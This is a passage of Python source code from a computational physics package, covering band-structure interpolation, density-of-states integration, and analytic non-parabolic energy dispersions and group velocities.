kxp, kyp, kzp = old_grid_unit_vecs eshape = energies[band].reshape(ksampling_old[0], ksampling_old[1], ksampling_old[2]) possible_methods = ["nearest", "linear"] if itype_sub not in possible_methods: options = ', '.join(map(str, possible_methods)) logger.error( "The specified itype_sub is not recognized " "by the interpn method, please consult the " "Scipy documentation for valid flags. " "Possible flags for itype_sub are: %s. Exiting.", options) sys.exit(1) ien_band = scipy.interpolate.interpn((kxp, kyp, kzp), eshape, new_grid, method=itype_sub) if ivelocities: vel1shape = velocities[band][0].reshape( ksampling_old[0], ksampling_old[1], ksampling_old[2]) vel2shape = velocities[band][1].reshape( ksampling_old[0], ksampling_old[1], ksampling_old[2]) vel3shape = velocities[band][2].reshape( ksampling_old[0], ksampling_old[1], ksampling_old[2]) ivel1_band = scipy.interpolate.interpn( (kxp, kyp, kzp), vel1shape, new_grid, method=itype_sub) ivel2_band = scipy.interpolate.interpn( (kxp, kyp, kzp), vel2shape, new_grid, method=itype_sub) ivel3_band = scipy.interpolate.interpn( (kxp, kyp, kzp), vel3shape, new_grid, method=itype_sub) if itype == "rbf": logger.info("Interpolating using Scipy RBF.") # this RBF routine uses crazy amounts of memory kx_old, ky_old, kz_old = old_grid.T kx_new, ky_new, kz_new = new_grid.T if itype_sub not in constants.rbf_functions: options = ', '.join(map(str, constants.rbf_functions)) logger.error( "The specified itype_sub is not recognized " "by the Rbf method, please consult the Scipy " "documentation for valid flags. Possible flags " "for itype_sub are: %s. Exiting.", options) sys.exit(1) # force Rbf to go through the original points smooth = 0.0 intere = scipy.interpolate.Rbf(kx_old, ky_old, kz_old, energies[band], function=itype_sub, smooth=smooth) ien_band = intere(kx_new, ky_new, kz_new) if ivelocities: intervel1 = scipy.interpolate.Rbf(kx_old, ky_old, kz_old, velocities[band][0], function=itype_sub, smooth=smooth) ivel1_band = intervel1(kx_new, ky_new, kz_new) intervel2 = scipy.interpolate.Rbf(kx_old, ky_old, kz_old, velocities[band][1], function=itype_sub, smooth=smooth) ivel2_band = intervel2(kx_new, ky_new, kz_new) intervel3 = scipy.interpolate.Rbf(kx_old, ky_old, kz_old, velocities[band][2], function=itype_sub, smooth=smooth) ivel3_band = intervel3(kx_new, ky_new, kz_new) ien[band] = ien_band if ivelocities: ivel1[band] = ivel1_band ivel2[band] = ivel2_band ivel3[band] = ivel3_band # again loop over bands in the C code if itype == "wildmagic": if itype_sub not in constants.wildmagic_methods: options = ', '.join(map(str, constants.wildmagic_methods)) logger.error( "The specified itype_sub is not recognized by " "the Wildmagic method, please consult the " "Wildmagic documentation for valid flags. " "Possible flags for itype_sub are: %s. Exiting.", options) sys.exit(1) logger.info("Interpolating using Wildmagic/GeometricTools.") # lazy import of wildmagic (optional) import t4me.wildmagic as wildmagic # pylint: disable=import-error, no-name-in-module # set boundary conditions bz_border = old_bz_border domainx = np.ascontiguousarray( np.array([bz_border[0], bz_border[1]], dtype=np.double)) domainy = np.ascontiguousarray( np.array([bz_border[2], bz_border[3]], dtype=np.double)) domainz = np.ascontiguousarray( np.array([bz_border[4], bz_border[5]], dtype=np.double)) new_grid_trans = new_grid.T ix = np.ascontiguousarray(new_grid_trans[0], dtype="double") iy = np.ascontiguousarray(new_grid_trans[1], dtype="double") iz = np.ascontiguousarray(new_grid_trans[2], dtype="double") if itype_sub == "trilinear": if gen_velocities: wildmagic.trilinear_gradient_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien, ivel1, ivel2, ivel3) else: wildmagic.trilinear_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien) elif itype_sub == "tricubic_exact": if gen_velocities: wildmagic.tricubic_exact_gradient_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien, ivel1, ivel2, ivel3) else: wildmagic.tricubic_exact_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien) elif itype_sub == "tricubic_bspline": if gen_velocities: wildmagic.tricubic_bspline_gradient_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien, ivel1, ivel2, ivel3) else: wildmagic.tricubic_bspline_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien) elif itype_sub == "akima": if gen_velocities: wildmagic.akima_gradient_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien, ivel1, ivel2, ivel3) else: wildmagic.akima_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(energies, dtype="double"), ix, iy, iz, ien) else: logger.error("The specified itype_sub is not recognized " "by the wildmagic method, please consult the " "wildmagic documentation for valid flags. " "Possible flags for itype_sub are: " "trilinear, tricubic_exact, tricubic_bspline " "and akima. Exiting.") sys.exit(1) if ivelocities and not gen_velocities: if itype_sub == "trilinear": wildmagic.trilinear_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 0, :], dtype=np.double), ix, iy, iz, ivel1) wildmagic.trilinear_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 1, :], dtype=np.double), ix, iy, iz, ivel2) wildmagic.trilinear_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 2, :], dtype=np.double), ix, iy, iz, ivel3) elif itype_sub == "tricubic_exact": wildmagic.tricubic_exact_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 0, :], dtype=np.double), ix, iy, iz, ivel1) wildmagic.tricubic_exact_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 1, :], dtype=np.double), ix, iy, iz, ivel2) wildmagic.tricubic_exact_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 2, :], dtype=np.double), ix, iy, iz, ivel3) elif itype_sub == "tricubic_bspline": wildmagic.tricubic_bspline_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 0, :], dtype=np.double), ix, iy, iz, ivel1) wildmagic.tricubic_bspline_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 1, :], dtype=np.double), ix, iy, iz, ivel2) wildmagic.tricubic_bspline_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 2, :], dtype=np.double), ix, iy, iz, ivel3) elif itype_sub == "akima": wildmagic.akima_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 0, :], dtype=np.double), ix, iy, iz, ivel1) wildmagic.akima_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 1, :], dtype=np.double), ix, iy, iz, ivel2) wildmagic.akima_execute_interface( ksampling_old, domainx, domainy, domainz, np.ascontiguousarray(velocities[:, 2, :], dtype=np.double), ix, iy, iz, ivel3) else: logger.error("The specified itype_sub is not recognized " "by the wildmagic method, please consult " "the wildmagic documentation for valid " "flags. Possible flags for itype_sub are: " "trilinear, tricubic_exact, tricubic_bspline " "and akima. Exiting.") sys.exit(1) if itype == "skw": # lazy import of skw_interface (optional) import t4me.skw_interface as skw_interface logger.info("Interpolating using SKW.") unitcell = self.lattice.unitcell positions = self.lattice.positions species = self.lattice.species factor = self.param.skw_expansion_factor ksampling = self.lattice.ksampling # SKW works with the IBZ # controlling the final SKW grid density is difficult, # so just eat it...modifications to this later should be # avoided new_grid, ien, ivel, iksampling = skw_interface.\ interpolate(np.ascontiguousarray(energies, dtype="double"), np.ascontiguousarray( old_grid, dtype="double"), np.ascontiguousarray( ksampling, dtype="intc"), np.ascontiguousarray( unitcell, dtype="double"), np.ascontiguousarray( positions, dtype="double"), np.ascontiguousarray(species, dtype="intc"), factor) else: if gen_velocities or ivelocities: # squeeze all individual directions into one array ivel = np.zeros((ivel1.shape[0], 3, ivel1.shape[1])) ivel[:, 0, :] = ivel1 ivel[:, 1, :] = ivel2 ivel[:, 2, :] = ivel3 # store in current object if store_inter: if iksampling is None: logger.info( "It is not possible to store the new interpolation " "grid in the Lattice() object when iksampling is " "not supplied. User beware that the grid and the " "data for the energies and velocities might now " "not be compatible. The grid data for the supplied " "kpoint_mesh is not stored. Continuing.") # the new grid is already in direct coordinates, but need # the IBZ grid. SKW creates borderless kpoint meshes if itype == "skw": self.lattice.create_kmesh(iksampling, borderless=True) np.seterr(divide='ignore', invalid='ignore') if not np.all( np.nan_to_num((self.lattice.kmesh - new_grid) / new_grid) < self.param.symprec): logger.error( "The regenerated kpoint mesh from SPGLIB " "does not match the output from the SKW " "routines within symprec defined in params.yml. " "Exiting.") sys.exit(1) self.energies = ien if ivelocities or gen_velocities: self.velocities = ivel else: self.velocities = None # we should now have the velocities # or gen_velocities was already False self.gen_velocities = False return None, None, None if kpoint_mesh is None: self.lattice = lattice_old if ivelocities or gen_velocities: return ien, ivel, new_grid return ien, False, new_grid def calc_density_of_states( # pylint: disable=too-many-locals # noqa: MC0001 self, return_data=False, num_samples=None, auto_scale=False, transport=False, integral_method=None, interpol_method=None, interpol_type=None): """ Calculate the density of states. Parameters ---------- return_data : boolean, optional If True, return the density of states data instead of storing it in the current `Bandstructure()` object. If False, set `dos_energies`, `dos_partial` and `dos_total` in the current `Bandstructure()` object. num_samples : integers, optional Number of energy samples. Necessary if auto_scale is set. Otherwise the `dos_num_samples` in the parameter file is used. auto_scale : boolean, optional If True, auto scale the energy axis to cover the supplied band structure. Otherwise the `dos_e_min` and `dos_e_max` from the parameter file is used to set up the energy range unless `transport` is set which overrides this. transport : bool, optional Set to True if the density of states calculated are to be used in transport calculations (i.e. to set up the scattering). This ensures that the energy range covers the requested range of chemical potential pluss / minus 'transport_energycutband' and is then padded with zeros for the remaining values down and up to the minimum and maximum values present in the `energies` entry of the `Bandstructure()` object. Using this option make it possible to calculate the density of states on a fine grid in the relevant transport region. integral_method : string, optional The integration method used to calculate the DOS: | "trapz" trapeziodal integration, uses :func:`scipy.integrate.trapz` | "simps" simpson integration, uses :func:`scipy.integrate.simps` | "romb" romberb integration, uses :func:`scipy.integrate.romb` | "tetra" tetrahedron method, uses the linear tetrahedron method implemented in `Spglib <https://atztogo.github.io/spglib/>`_ (up to version 1.7.4) by <NAME>. If not supplied, set according to `dos_integrating_method` in the general configuration file. Returns ------- dos_energies : ndarray | Dimension: (N) Array containing the density of states energies, where N is num_samples or set by the sampling determined in the general configuration file if `auto_scale` is set to False. dos_total : ndarray | Dimension: (N) Array containing the total density of states per volume unit (units 1 / eV / AA ^ 3) at N sampled energy points, where N is determined from dos_energies. dos_partial : ndarray | Dimension: (M, N) Array containing the partial (for each band index M) density of states per volume unit (1 / eV / AA ^ 3) at N sampled energy points, where N is determined from dos_energies. See Also -------- scipy.integrate.trapz scipy.integrate.simps scipy.integrate.romb """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running calc_density_of_states.") # set some constants num_bands = self.energies.shape[0] # volume of reciprocal unit cell volume_bz = np.linalg.det(self.lattice.runitcell) # volume of the unit cell volume = np.linalg.det(self.lattice.unitcell) if integral_method is None: integral_method = self.param.dos_integrating_method if interpol_method is None: try: interpol_method = self.param.dos_interpolate_method except AttributeError: pass if interpol_type is None: try: interpol_type = self.param.dos_interpolate_type except AttributeError: pass # now, determine if the dos is to be used for transport if transport: logger.info("Adjusting the density of states energy " "interval to " "[transport_chempo_min-transport_energycutband:" "transport_chempot_max+transport_energycutband]") e_min = (self.param.transport_chempot_min - self.param.transport_energycutband) e_max = (self.param.transport_chempot_max + self.param.transport_energycutband) dos_energies = self.fetch_dos_energies(e_min=e_min, e_max=e_max) else: dos_energies = self.fetch_dos_energies(auto_scale=auto_scale) num_samples = dos_energies.shape[0] dos = np.zeros((num_bands, num_samples), dtype='double') int_dos = np.zeros((num_bands, num_samples), dtype='double') if integral_method in ("tetra", "smeared"): # lazy import import t4me.spglib_interface as spglib_interface # pylint: disable=import-error, no-name-in-module # these routines only work on the IBZ grid, so # check if ibz grid is not None if self.lattice.kmesh_ired is None: logger.error("The irreducible grid is not available. " "This can for instance happen if the user have " "preinterpolated the grid using a interpolation " "routine where determining the IBZ is difficult. " "Or if the user supplies numerical data without " "mapping tables. Try one of the other " "integration techniques. Exiting.") sys.exit(1) else: num_kpoints_ibz = self.lattice.kmesh_ired.shape[0] if integral_method == 'tetra': weight_type = 0 smearing = 0.0 logger.debug("Running tetrahedron method.") if self.param.read == "numpy": logger.error( "The tetrahedron method is not supported when " "reading data from Numpy yet. Exiting.") sys.exit(1) else: weight_type = 2 smearing = self.param.dos_smearing logger.debug("Running smearing method.") # here we call the weighted DOS routine (accepts IBZ # data) energies_ibz = np.take(self.energies, self.lattice.mapping_ibz_to_bz, axis=1) spglib_interface.calc_density_of_states_interface( energies_ibz, self.lattice.spg_kmesh, np.ascontiguousarray(self.lattice.mapping_bz_to_ibz, dtype='intc'), np.ascontiguousarray(self.lattice.mapping_ibz_to_bz, dtype='intc'), np.ascontiguousarray(self.lattice.ibz_weights, dtype='intc'), self.lattice.ksampling, self.lattice.runitcell, dos_energies, num_samples, num_bands, num_kpoints_ibz, self.spin_degen, volume, volume_bz, weight_type, smearing, dos, int_dos) elif integral_method in ("trapz", "simps", "romb"): logger.debug( "Running trapeziodal, simpson or romberg integration.") # fetch step size in direct coordinates and set Jacobian, which is # needed since we perform the integration in direct coordinates kx, ky, kz = self.lattice.fetch_kmesh_step_size(direct=True) jacobian = np.linalg.det(self.lattice.runitcell) # now if we want romberg, we need to check for add grid samples # also make sure that kx, ky, kz is a float and the space between # each point for romberb (only trapz and simps support array) if integral_method == "romb": if not utils.is_power_of_two(self.lattice.ksampling[0] - 1): logger.error("User requests romberg integration, but " "the samplings in the first direction is not " "2^k - 1. Exiting.") sys.exit(1) if not utils.is_power_of_two(self.lattice.ksampling[1] - 1): logger.error( "User requests romberg integration, but " "the samplings in the second direction is not " "2^k - 1. Exiting.") sys.exit(1) if not utils.is_power_of_two(self.lattice.ksampling[2] - 1): logger.error("User requests romberg integration, but " "the samplings in the third direction is not " "2^k - 1. Exiting.") sys.exit(1) for band in range(0, num_bands): spin_factor = self.spin_degen[band] energies_shaped = self.energies[band].reshape( self.lattice.ksampling[0], self.lattice.ksampling[1], self.lattice.ksampling[2]) for sample_index, sample_energy in np.ndenumerate( dos_energies): energies_smeared = gaussian(energies_shaped, sample_energy, self.param.dos_smearing) if integral_method == "trapz": dos[band][sample_index] = spin_factor * \ scipy.integrate.trapz( scipy.integrate.trapz( scipy.integrate.trapz( energies_smeared, dx=kz), dx=ky), dx=kx) / \ volume_bz / volume elif integral_method == "simps": dos[band][sample_index] = spin_factor * \ scipy.integrate.simps( scipy.integrate.simps( scipy.integrate.simps( energies_smeared, dx=kz), dx=ky), dx=kx) / \ volume_bz / volume elif integral_method == "romb": dos[band][sample_index] = spin_factor * \ scipy.integrate.romb( scipy.integrate.romb( scipy.integrate.romb( energies_smeared, dx=kz), dx=ky), dx=kx) / \ volume_bz / volume else: logger.error("The supplied integral_method is not supported. " "Use: 'tetra', 'trapz','simps' or 'romb'. " "Exiting.") sys.exit(1) # add Jacobian (we integrate in direct coordinates) dos = jacobian * dos dos_total = dos.sum(-2) if not return_data: self.dos_partial = dos self.dos = dos_total self.dos_energies = dos_energies return None, None, None return dos_energies, dos_total, dos def fetch_dos_energies(self, e_min=None, e_max=None, num_samples=None, auto_scale=False): """ Set up the energy array for density of states calculations. Parameters ---------- e_min : float The mininum energy in eV. e_max : float The maximum energy in eV. num_samples : integer The N number of samples between `e_min` and `e_max`. auto_scale : boolean If True, set the energy scale from the supplied band structure, otherwise set the scale according to `e_min` and `e_max`. Returns ------- ndarray | Dimension: (N) The N energies in eV where density of states calculations are to be performed. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running fetch_dos_energies.") if num_samples is None: num_samples = self.param.dos_num_samples if (e_min or e_max) is None: if auto_scale: # fetch maximum and minimum energy from the # bandstructure and pad with 0.1 eV in order to catch # the DOS head and tail e_min = np.amin(self.energies) - 0.1 e_max = np.amax(self.energies) + 0.1 else: e_min = self.param.dos_e_min e_max = self.param.dos_e_max return np.linspace(e_min, e_max, num_samples) def fetch_min_max_energy(self): """ Returns the min and max of the energy in the current `Bandstructure()` object. Parameters ---------- None Returns ------- emin : float The minimum energy in eV located in the current `Bandstructure()` object. emax : float The maximum energy in eV located in the current `Bandstructure()` object. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running fetch_min_max_energy.") emin = np.amin(self.energies) emax = np.amax(self.energies) return emin, emax def gaussian(energy, energy_ref, smearing): """ Returns the value of a Gaussian function. Parameters ---------- energy : float The energy in eV. energy_ref : float The reference energy in eV. smearing : float The smearing factor in eV. Returns ------- float The value in eV. """ energy_shifted = energy_ref - energy return np.exp(-0.5 * np.power(energy_shifted / smearing, 2.0)) / \ (smearing * np.sqrt(2 * np.pi)) def non_parabolic_energy_1(k, effmass, a, scale, e0=0.0, kshift=None): r""" Calculates a energy dispersion, both parabolic and non-parabolic. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point coordinates (cartesian) where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^2k^4` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction e0 : float, optional Shift of the energy scale in eV. kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- ndarray | Dimension: (N) Contains the energy dispersion in eV at each N k-points. Notes ----- This routines calculates the energy dispersion according to .. math:: E=\\frac{\\hbar^2 k^2}{2m}+ak^4. Setting :math:`a` to zero yields a parabolic dispersion. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_energy_1.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k4 = np.power(np.sum(a * k2, axis=1), 2.0) k2 = np.sum(k2 / effmass, axis=1) return e0 + constants.bandunit * k2 + scale * k4 def non_parabolic_velocity_1(k, effmass, a, scale, kshift=None): r""" Calculates the group velocity for the energy dispersion generated in :func:`non_parabolic_energy_1`. For both parabolic and non-parabolic bands. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point in cartesian coordinates where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^2k^4` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- vx, vy, vz : ndarray, ndarray, ndarray | Dimension: (N),(N),(N) Contains the group velocity at each N k-points for each direction defined by the direction of the k-point unit axis. Units of eVAA. Notes ----- This routines calculates the group velocity according to .. math:: v=\\frac{\\partial E}{\\partial \\vec{k}}, where .. math:: E=\\frac{\\hbar^2 k^2}{2m}+ak^4. Setting :math:`a` to zero yields a parabolic dispersion and thus its group velocity. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_velocity_1.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k2 = np.sum(a * k2, axis=1) parabolic = np.divide(2.0 * constants.bandunit, effmass) scaling = (parabolic + scale * 4.0 * np.column_stack( (a[0] * k2, a[1] * k2, a[2] * k2))).T spreadkz, spreadky, spreadkx = k.T[2], k.T[1], k.T[0] vx = np.multiply(scaling[0], spreadkx) vy = np.multiply(scaling[1], spreadky) vz = np.multiply(scaling[2], spreadkz) return vx, vy, vz def non_parabolic_energy_3(k, effmass, a, scale, e0=0.0, kshift=None): r""" Calculates a k^2 + k^6 energy dispersion. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point coordinates (cartesian) where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^4k^8` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction e0 : float, optional Shift of the energy scale in eV. kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- ndarray | Dimension: (N) Contains the energy dispersion in eV at each N k-points. Notes ----- This routines calculates the energy dispersion according to .. math:: E=\\frac{\\hbar^2 k^2}{2m}+a^3k^6. Setting :math:`a` to zero yields a parabolic dispersion. """ # Set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_energy_3.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k ak2 = np.sum(a * k2, axis=1) k6 = np.power(ak2, 3.0) k2 = np.sum(k2 / effmass, axis=1) return e0 + constants.bandunit * k2 + scale * k6 def non_parabolic_velocity_3(k, effmass, a, scale, kshift=None): r""" Calculates the group velocity for the energy dispersion generated in :func:`non_parabolic_energy_3`. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point in cartesian coordinates where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^4k^8` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- vx, vy, vz : ndarray, ndarray, ndarray | Dimension: (N),(N),(N) Contains the group velocity at each N k-points for each direction defined by the direction of the k-point unit axis. Units of eVAA. Notes ----- This routines calculates the group velocity according to .. math:: v=\\frac{\\partial E}{\\partial \\vec{k}}, where .. math:: E=\\frac{\\hbar^2 k^2}{2m}+a^3k^6. Setting :math:`a` to zero yields a parabolic dispersion and thus its group velocity. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_velocity_3.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k2 = np.sum(a * k2, axis=1) k4 = np.power(k2, 2.0) parabolic = np.divide(2.0 * constants.bandunit, effmass) scaling = (parabolic + scale * 6.0 * np.column_stack( (a[0] * k4, a[1] * k4, a[2] * k4))).T spreadkz, spreadky, spreadkx = k.T[2], k.T[1], k.T[0] vx = np.multiply(scaling[0], spreadkx) vy = np.multiply(scaling[1], spreadky) vz = np.multiply(scaling[2], spreadkz) return vx, vy, vz def non_parabolic_energy_4(k, effmass, a, scale, e0=0.0, kshift=None): r""" Calculates a k^2 + k^8 energy dispersion. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point coordinates (cartesian) where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^4k^8` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction e0 : float, optional Shift of the energy scale in eV. kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- ndarray | Dimension: (N) Contains the energy dispersion in eV at each N k-points. Notes ----- This routines calculates the energy dispersion according to .. math:: E=\\frac{\\hbar^2 k^2}{2m}+a^4k^8. Setting :math:`a` to zero yields a parabolic dispersion. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_energy_4.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k ak2 = np.sum(a * k2, axis=1) k8 = np.power(ak2, 4.0) k2 = np.sum(k2 / effmass, axis=1) return e0 + constants.bandunit * k2 + scale * k8 def non_parabolic_velocity_4(k, effmass, a, scale, kshift=None): r""" Calculates the group velocity for the energy dispersion generated in :func:`non_parabolic_energy_4`. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point in cartesian coordinates where the dispersion is to be evaluated. effmass : ndarray | Dimension: (3) Contains the effective mass along the three k-point directions. Only the diagonal components of the effective mass tensor is used. In units of the free electron mass. a : ndarray | Dimension: (3) The non parabolic coefficients in front of each :math:`k^2` direction which translates to :math:`a^4k^8` in the one dimensional case. scale : float The scale factor in front of the non-parabolic correction kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- vx, vy, vz : ndarray, ndarray, ndarray | Dimension: (N),(N),(N) Contains the group velocity at each N k-points for each direction defined by the direction of the k-point unit axis. Units of eVAA. Notes ----- This routines calculates the group velocity according to .. math:: v=\\frac{\\partial E}{\\partial \\vec{k}}, where .. math:: E=\\frac{\\hbar^2 k^2}{2m}+a^4k^8. Setting :math:`a` to zero yields a parabolic dispersion and thus its group velocity. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_velocity_4.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k2 = np.sum(a * k2, axis=1) k6 = np.power(k2, 3.0) parabolic = np.divide(2.0 * constants.bandunit, effmass) scaling = (parabolic + scale * 8.0 * np.column_stack( (a[0] * k6, a[1] * k6, a[2] * k6))).T spreadkz, spreadky, spreadkx = k.T[2], k.T[1], k.T[0] vx = np.multiply(scaling[0], spreadkx) vy = np.multiply(scaling[1], spreadky) vz = np.multiply(scaling[2], spreadkz) return vx, vy, vz def non_parabolic_energy_5(k, _, a, scale, e0=0.0, kshift=None): r""" Calculates a linear energy dispersion. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point coordinates (cartesian) where the dispersion is to be evaluated. _ : A dummy. a : ndarray | Dimension: (3) The coefficients in front of each :math:`k^2` direction which translates to :math:`\\sqrt(a)k` in the one dimensional case. scale : float The scale factor in front of the linear expression. e0 : float, optional Shift of the energy scale in eV. kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- ndarray | Dimension: (N) Contains the energy dispersion in eV at each N k-points. Notes ----- This routines calculates the energy dispersion according to (in one dimension) .. math:: E=a\\sqrt(k^2). Multiplied by the scale factor in front of this. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_energy_5.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k2 = np.sum(a * k2, axis=1) return e0 + scale * np.sqrt(k2) def non_parabolic_velocity_5(k, _, a, scale, kshift=None): r""" Calculates the group velocity for the energy dispersion generated in :func:`non_parabolic_energy_5`. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point in cartesian coordinates where the dispersion is to be evaluated. _ : A dummy. a : ndarray | Dimension: (3) The coefficients in front of each :math:`k^2` direction which translates to :math:`\\sqrt(a)k` in the one dimensional case. scale : float The scale factor in front of the linear expression. kshift : ndarray, optional | Dimension: (3) The shift along the respective k-point vectors in cartesian coordinates. Returns ------- vx, vy, vz : ndarray, ndarray, ndarray | Dimension: (N),(N),(N) Contains the group velocity at each N k-points for each direction defined by the direction of the k-point unit axis. Units of eVAA. Notes ----- This routines calculates the group velocity according to .. math:: v=\\frac{\\partial E}{\\partial \\vec{k}}, where .. math:: E=a\\sqrt(k^2). Multiplied by the scale factor in front of this. .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_velocity_5.") if kshift is None: kshift = [0.0, 0.0, 0.0] k = k - kshift k2 = k * k k2 = np.sum(a * k2, axis=1) vx = scale * a[0] * k[:, 0] / np.sqrt(k2) vy = scale * a[1] * k[:, 1] / np.sqrt(k2) vz = scale * a[2] * k[:, 2] / np.sqrt(k2) return vx, vy, vz def non_parabolic_energy_2(k, effmass, a): r""" Calculates a non-parabolic energy dispersion. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point cartesian coordinates where the dispersion is to be evaluated. effmass : float The effective mass in units of the free electron mass. a : float The :math:`\\alpha` factor. Returns ------- ndarray | Dimension: (N) Contains the energy in eV at each N k-points for each direction defined by the direction of the k-point unit axis. Notes ----- This routine calculates the energy dispersion according to .. math:: E(1+\\alpha E)=\\frac{\\hbar^2k^2}{2m}, where :math:`\\alpha` is a parameter that adjust the non-parabolicity Note that if :math:`m` is negative (valence bands), the square root is undefined for :math:`k^2>=m/(2\\alpha \\hbar)`, which is a rather limited k-space volume. Consider (either :math:`m` or :math:`\\alpha` negative). .. math:: m=m_e, \\alpha=1.0 (E_g=1.0 \\mathrm{eV}) \\rightarrow |\\vec{k}| \\geq 0.26 \\mathrm{AA^{-1}} .. math:: m=0.1m_e, \\alpha=1.0 \\rightarrow |\\vec{k}| \\geq 0.081 \\mathrm{AA^{-1}} .. math:: m=10m_e, \\alpha=1.0 \\rightarrow |\\vec{k}| \\geq 0.81 \\mathrm{AA^{-1}} .. math:: m=m_e, 